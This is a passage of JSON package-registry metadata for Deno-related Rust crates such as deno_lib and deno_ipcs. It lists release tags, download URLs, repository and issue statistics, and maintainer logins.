nifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.4/manifests"},{"name":"v0.3.3","sha":"3dbb06e699398549e8cfabc896ef3256ab433cba","kind":"tag","published_at":"2019-03-13T18:16:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.3/manifests"},{"name":"v0.3.2","sha":"535037b519711d238dc0bfa2c4d2ffb4b17dec53","kind":"commit","published_at":"2019-03-07T02:22:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.2/manifests"},{"name":"v0.3.1","sha":"b0c7b54f692ecc866d4f70bfa384631523bbf924","kind":"commit","published_at":"2019-02-27T21:20:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.1/manifests"},{"name":"v0.3.0","sha":"a5720d9e28f7ee5868049504816405392c2821d7","kind":"commit","published_at":"2019-02-19T04:22:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.0/manifests"},{"name":"v0.2.11","sha":"b2fb8261e700c75cfb9a626ae57bbd3098e08454","kind":"commit","published_at":"2019-02-09T04:34:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.11","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.11/manifests"},{"name":"v0.2.10","sha":"c3241822522fb2b13792fe5666596888057cf829","kind":"commit","published_at":"2019-02-02T23:26:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.10","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.10/manifests"},{"name":"v0.2.9","sha":"1681bda14d1552860645e40f91f667accefe50cb","kind":"commit","published_at":"2019-01-30T03:57:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.9","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.9/manifests"},{"name":"v0.2.8","sha":"a47d545e4d0831713d0107e86cead7b4506a9bf6","kind":"commit","published_at":"2019-01-19T16:54:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.8","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.8/manifests"},{"name":"v0.2.7","sha":"eb4a19ef6ef1c5ae797fb515c45627deca65cf31","kind":"commit","published_at":"2019-01-15T01:25:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.7","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.7/manifests"},{"name":"v0.2.6","sha":"404e6f86345216c9205cabb88b19eaca762095e0","kind":"commit","published_at":"2019-01-07T22:33:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.6","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.6/manifests"},{"name":"v0.2.5","sha":"320577c131c8058ba0065f26119ce1ce18bc23d2","kind":"commit","published_at":"2019-01-01T19:30:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.5/manifests"},{"name":"v0.2.4","sha":"c6e2fffc1388cdb4411d6c2cff36c4febb7c75d5","kind":"commit","published_at":"2018-12-24T04:39:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.4/manifests"},{"name":"v0.2.3","sha":"c69d2f554d05ba9e4d09af6ae451ce5676876e61","kind":"commit","published_at":"2018-12-14T20:11:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.3/manifests"},{"name":"v0.2.2","sha":"e6121762f8bf3c531c4c60229ff4a156ae21d931","kind":"commit","published_at":"2018-12-07T22:44:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.2/manifests"},{"name":"v0.2.1","sha":"b5c6bfa0c8a3df9598211bc68db5408f5eec147d","kind":"commit","published_at":"2018-12-01T00:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.1/manifests"},{"name":"v0.2.0","sha":"d083f7271b11d87ddba90869d2bcd2cf312e77af","kind":"commit","published_at":"2018-11-16T05:23:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.0/manifests"},{"name":"v0.1.12","sha":"0c740ff85d855177d1619276154f63a36ed31557","kind":"commit","published_at":"2018-11-12T17:16:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.12","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.12/manifests"},{"name":"v0.1.11","sha":"e1d5f82d36f08b9c7a7c6233b7ce354a5cf82836","kind":"commit","published_at":"2018-11-05T22:51:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.11","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.11/manifests"},{"name":"v0.1.10","sha":"da959e8c878382ce3417ab61db8ccf1ae9a660fa","kind":"commit","published_at":"2018-10-27T15:13:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.10","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.10/manifests"},{"name":"v0.1.9","sha":"c85311dd7dbad09242633d2ee7a83fdb1cbd1d7f","kind":"commit","published_at":"2018-10-21T00:30:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.9","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.9/manifests"},{"name":"v0.1.8","sha":"d92c99eabaf28100a8d181b6f289e2e3fc295107","kind":"commit","published_at":"2018-10-12T18:44:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.8","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.8/manifests"},{"name":"v0.1.7","sha":"5307aa94e14d99a226366a275e011a60161c9c39","kind":"commit","published_at":"2018-10-04T12:56:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.7","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.7/manifests"},{"name":"v0.1.6","sha":"77e876388bf1b2b3959f25a1cb057a1f96c76ba7","kind":"commit","published_at":"2018-09-29T17:36:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.6","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.6/manifests"},{"name":"v0.1.5","sha":"8e958d3ad68e610061e82fb9f456eab79330633e","kind":"commit","published_at":"2018-09-22T03:21:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.5/manifests"},{"name":"v0.1.4","sha":"d38b3b585ca68f4bc9e95faa6c9c036dc8982575","kind":"commit","published_at":"2018-09-13T00:45:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.4/manifests"},{"name":"v0.1.3","sha":"59f3fca166e7d3bd3095f9df0f7040defe3239e1","kind":"commit","published_at":"2018-09-06T03:08:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.3/manifests"},{"name":"v0.1.2","sha":"cce3bd470b19e1c2eab6530d06c48949891a56fc","kind":"commit","published_at":"2018-08-30T22:29:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.2/manifests"},{"name":"v0.1.1","sha":"c42e4ddbb7973bfb0c57a49ab6bf6dc432baad7e","kind":"commit","published_at":"2018-08-28T13:37:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.1/manifests"},{"name":"v0.1.0","sha":"68d388229ea6ada339d68eb3d67feaff7a31ca97","kind":"commit","published_at":"2018-08-23T14:37:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.0/manifests"},{"name":"v0.0.3","sha":"ca4ace6b1f054593029df4958538708c2fbbabc2","kind":"commit","published_at":"2018-08-22T16:08:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.3/manifests"},{"name":"v0.0.2","sha":"6a8fbc8b522a710699bcf9738c2194dec797b428","kind":"commit","published_at":"2018-08-21T03:43:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.2/manifests"},{"name":"v0.0.1","sha":"67d89ff692a88ae42145043eac1a5c58413ae110","kind":"commit","published_at":"2018-08-17T16:58:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.1/manifests"}]},"repo_metadata_updated_at":"2026-08-23T02:24:46.119Z","dependent_packages_count":0,"downloads":59055,"downloads_period":"total","dependent_repos_count":0,"rankings":{"downloads":95.7596418936946,"dependent_repos_count":24.440162452198145,"dependent_packages_count":32.41514244211899,"stargazers_count":null,"forks_count":null,"docker_downloads_count":null,"average":50.87164892933725},"purl":"pkg:cargo/deno_lib","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/cargo/deno_lib","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/cargo/deno_lib","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/cargo/deno_lib/dependencies","status":null,"funding_links":[],"critical":null,"issue_metadata":{"last_synced_at":"2026-08-22T15:36:05.774Z","issues_count":6593,"pull_requests_count":9606,"avg_time_to_close_issue":17240482.91906903,"avg_time_to_close_pull_request":1537756.603103103,"issues_closed_count":3779,"pull_requests_closed_count":7991,"pull_request_authors_count":571,"issue_authors_count":2462,"avg_comments_per_issue":2.5116032155316246,"avg_comments_per_pull_request":0.7158026233603998,"merged_pull_requests_count":6976,"bot_issues_count":0,"bot_pull_requests_count":47,"past_year_issues_count":659,"past_year_pull_requests_count":1189,"past_year_avg_time_to_close_issue":1375932.5787037036,"past_year_avg_time_to_close_pull_request":1325136.485893417,"past_year_issues_closed_count":216,"past_year_pull_requests_closed_count":638,"past_year_pull_request_authors_count":177,"past_year_issue_authors_count":370,"past_year_avg_comments_per_issue":1.2109256449165402,"past_year_avg_comments_per_pull_request":1.07905803195963,"past_year_bot_issues_count":0,"past_year_bot_pull_requests_count":16,"past_year_merged_pull_requests_count":468,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/issues","maintainers":[{"login":"bartlomieju","count":1779,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bartlomieju"},{"login":"dsherret","count":1732,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dsherret"},{"login":"littledivy","count":926,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/littledivy"},{"login":"nathanwhit","count":673,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nathanwhit"},{"login":"kt3k","count":443,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kt3k"},{"login":"nayeemrmn","count":374,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nayeemrmn"},{"login":"lucacasonato","count":353,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucacasonato"},{"login":"mmastrac","count":314,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/mmastrac"},{"login":"denobot","count":288,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/denobot"},{"login":"crowlKats","count":281,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/crowlKats"},{"login":"iuioiua","count":269,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/iuioiua"},{"login":"devsnek","count":164,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/devsnek"},{"login":"satyarohith","count":150,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/satyarohith"},{"login":"ry","count":110,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ry"},{"login":"magurotuna","count":65,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/magurotuna"},{"login":"losfair","count":26,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/losfair"},{"login":"piscisaureus","count":20,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/piscisaureus"},{"login":"aapoalas","count":18,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/aapoalas"},{"login":"philhawksworth","count":12,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/philhawksworth"},{"login":"arnauorriols","count":10,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/arnauorriols"},{"login":"lucab","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucab"},{"login":"qti3e","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/qti3e"},{"login":"ashleysyg","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ashleysyg"},{"login":"Elizarspbspb","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Elizarspbspb"},{"login":"RomanDavlyatshin","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/RomanDavlyatshin"},{"login":"aryyawijaya","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/aryyawijaya"},{"login":"Mohsen-mhm","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Mohsen-mhm"}],"active_maintainers":[{"login":"bartlomieju","count":377,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bartlomieju"},{"login":"nathanwhit","count":187,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nathanwhit"},{"login":"littledivy","count":36,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/littledivy"},{"login":"dsherret","count":34,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dsherret"},{"login":"crowlKats","count":32,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/crowlKats"},{"login":"devsnek","count":12,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/devsnek"},{"login":"denobot","count":8,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/denobot"},{"login":"magurotuna","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/magurotuna"},{"login":"piscisaureus","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/piscisaureus"},{"login":"ry","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ry"},{"login":"lucacasonato","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucacasonato"},{"login":"kt3k","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kt3k"}]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_lib/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_lib/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_lib/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_lib/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_lib/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_lib/codemeta","maintainers":[{"uuid":"91327","login":"bartlomieju","name":"Bartek Iwańczuk","email":null,"url":"https://github.com/bartlomieju","packages_count":116,"html_url":"https://crates.io/users/bartlomieju","role":null,"created_at":"2025-01-20T13:08:32.679Z","updated_at":"2025-01-20T13:08:32.679Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/maintainers/bartlomieju/packages"},{"uuid":"221986","login":"denobot","name":null,"email":null,"url":"https://github.com/denobot","packages_count":106,"html_url":"https://crates.io/users/denobot","role":null,"created_at":"2025-01-20T13:08:32.987Z","updated_at":"2025-01-20T13:08:32.987Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/maintainers/denobot/packages"}],"registry":{"name":"crates.io","url":"https://crates.io","ecosystem":"cargo","default":true,"packages_count":338199,"maintainers_count":71476,"namespaces_count":0,"keywords_count":71845,"github":"rust-lang","metadata":{"funded_packages_count":30558,"rate_limit":2},"icon_url":"https://github.com/rust-lang.png","created_at":"2022-04-04T15:19:22.689Z","updated_at":"2026-09-04T05:05:22.166Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/namespaces"}},{"id":10862022,"name":"deno_ipcs","ecosystem":"cargo","description":"ipcs implementation for Deno","homepage":null,"licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/denoland/deno","keywords_array":[],"namespace":null,"versions_count":2,"first_release_published_at":"2024-09-06T06:33:11.125Z","latest_release_published_at":"2024-09-11T04:32:39.398Z","latest_release_number":"0.2.0","last_synced_at":"2026-09-07T22:53:44.209Z","created_at":"2024-09-06T06:47:28.737Z","updated_at":"2026-09-07T22:53:44.209Z","registry_url":"https://crates.io/crates/deno_ipcs/","install_command":"cargo install deno_ipcs","documentation_url":"https://docs.rs/deno_ipcs/","metadata":{"categories":[]},"repo_metadata":{"id":37251508,"uuid":"133442384","full_name":"denoland/deno","owner":"denoland","description":"A modern runtime for JavaScript and TypeScript.","archived":false,"fork":false,"pushed_at":"2026-09-04T18:13:25.000Z","size":249845,"stargazers_count":108384,"open_issues_count":1549,"forks_count":6373,"subscribers_count":1430,"default_branch":"main","last_synced_at":"2026-09-06T18:12:48.927Z","etag":null,"topics":["deno","javascript","rust","typescript"],"latest_commit_sha":null,"homepage":"https://deno.com","language":"Rust","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/denoland.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":".github/CONTRIBUTING.md","funding":null,"license":"LICENSE.md","code_of_conduct":".github/CODE_OF_CONDUCT.md","threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":".github/SECURITY.md","support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"claude":"CLAUDE.md","ge